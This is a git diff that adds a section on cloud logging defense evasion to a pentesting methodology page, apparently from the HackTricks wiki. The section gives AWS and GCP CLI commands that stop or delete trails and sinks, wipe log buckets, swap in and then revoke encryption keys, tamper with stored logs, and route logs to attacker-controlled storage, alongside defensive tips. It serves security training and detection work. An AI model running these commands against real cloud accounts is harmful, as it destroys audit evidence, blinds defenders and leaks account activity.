diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index 9aa8f5ec6..259979c2e 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -420,6 +420,115 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec) + +## Cloud Logging Defense Evasion & Log Exfiltration + +Cloud audit pipelines are also an **attack surface**. If an attacker gets permissions over the **log router** (CloudTrail trail / GCP sink), the **destination storage** (S3 / log bucket / Cloud Storage), or the **encryption key** (KMS / CMEK), they can blind detections, destroy evidence, poison forensic data, or get passive visibility into the victim account. + +### Preconditions to check + +High-risk permissions in this area include: + +- **AWS:** `cloudtrail:StopLogging`, `cloudtrail:DeleteTrail`, `cloudtrail:UpdateTrail`, `cloudtrail:CreateTrail`, `s3:DeleteBucket`, `s3:DeleteObject`, `s3:GetObject`, `s3:PutObject`, and KMS permissions that let an attacker swap or break the key used by CloudTrail. +- **GCP:** `logging.sinks.update`, `logging.sinks.delete`, `logging.sinks.create`, `logging.buckets.delete`, `storage.objects.get`, `storage.objects.create`, and KMS/CMEK permissions affecting log buckets. + +### Common attacker playbooks + +#### 1. Stop log delivery + +- **AWS:** stop the trail so no new events are delivered to the configured S3 bucket. +- **GCP:** disable the sink so matching entries are no longer routed. + +```bash +# AWS +aws cloudtrail stop-logging --name + +# GCP +gcloud logging sinks update --disabled +``` + +#### 2. Delete the router or the destination + +Deleting the **router** stops future delivery. Deleting the **destination** can both stop delivery and destroy historical evidence. + +```bash +# AWS: delete router +aws cloudtrail delete-trail --name + +# AWS: delete historical log storage (bucket must be empty first) +aws s3 rm s3:// --recursive +aws s3api delete-bucket --bucket + +# GCP: delete router +gcloud logging sinks delete + +# GCP: delete log bucket +gcloud logging buckets delete --location= +``` + +#### 3. Break logging with an attacker-controlled encryption key + +A stealthier pattern is to **repoint logging to an attacker-controlled KMS/CMEK key** that initially works, and then revoke the logging service access to that key. + +- **AWS:** `update-trail --kms-key-id ` and then remove the `cloudtrail.amazonaws.com` access from the key policy or delete the key material. CloudTrail may surface a misleading **bucket access denied** style error even though the bucket is fine. +- **GCP:** if the log bucket already supports CMEK, update it to use an attacker-controlled key and then revoke the Cloud Logging service account decrypt permissions. Reverting may fail because the current key can no longer decrypt the bucket. + +```bash +# AWS +aws cloudtrail update-trail --name --kms-key-id + +# GCP +gcloud logging buckets update \ + --location= \ + --cmek-kms-key-name= +``` + +#### 4. Poison historical logs + +If logs are exported as **JSON objects** into object storage, an attacker with object read/write permissions can download, modify, and overwrite historical records. + +- **AWS:** modify CloudTrail objects in S3. Downstream consumers such as Athena may parse the poisoned events. +- **GCP:** when sinks export to Cloud Storage, modify the stored objects there. + +> [!TIP] +> In AWS, enable **CloudTrail log file integrity validation** to detect post-delivery tampering. This is especially important for trails created through CLI/API workflows. + +#### 5. Create a parallel log export for passive visibility + +Instead of running noisy discovery commands, an attacker can configure a **new** router that continuously exports victim activity to attacker-controlled infrastructure. + +```bash +# AWS +aws cloudtrail create-trail \ + --name \ + --s3-bucket-name + +# GCP +gcloud logging sinks create --log-filter="FILTER_CONDITION" +``` + +This provides passive discovery of API calls, IAM changes, new compute instances, and access to sensitive services. + +#### 6. Redirect the existing pipeline + +Modifying the current destination is usually noisier from a defender perspective than creating a second pipeline, but it can also **blind** the original monitoring stack while exfiltrating the same logs. + +```bash +# AWS +aws cloudtrail update-trail --name --s3-bucket-name + +# GCP +gcloud logging sinks update +``` + +### High-value defensive details + +- **AWS CloudTrail Event History** keeps an immutable **90-day** history for **management events**, but **data** and **network** events are not covered there. +- **AWS EventBridge** rules on trail creation, modification, deletion, and `StopLogging` can catch log-plane tampering. +- **GCP `_Required`** log bucket cannot be disabled, modified, or deleted, so it is the safest place for critical audit logs. +- **GCP locked log buckets** prevent premature deletion because retention becomes irreversible until all retained entries age out. + + ## Google ### GCP @@ -454,7 +563,15 @@ azure-security/ confidential-computing/luks2-header-malleability-null-cipher-abuse.md {{#endref}} -{{#include ../banners/hacktricks-training.md}} +## References +- [Unit 42 - Blinding the Watchmen: Abusing Cloud Logging Services for Defense Evasion and Visibility](https://unit42.paloaltonetworks.com/cloud-logging-defense-evasion/) +- [AWS CloudTrail User Guide](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-user-guide.html) +- [AWS CloudTrail log file integrity validation](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html) +- [AWS CloudTrail Event History](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/view-cloudtrail-events.html) +- [Google Cloud Logging sinks](https://docs.cloud.google.com/logging/docs/export/configure_export_v2) +- [Google Cloud Logging bucket locking](https://docs.cloud.google.com/logging/docs/buckets#locking-logs-buckets) +- [Google Cloud Logging CMEK](https://docs.cloud.google.com/logging/docs/routing/managed-encryption) +{{#include ../banners/hacktricks-training.md}}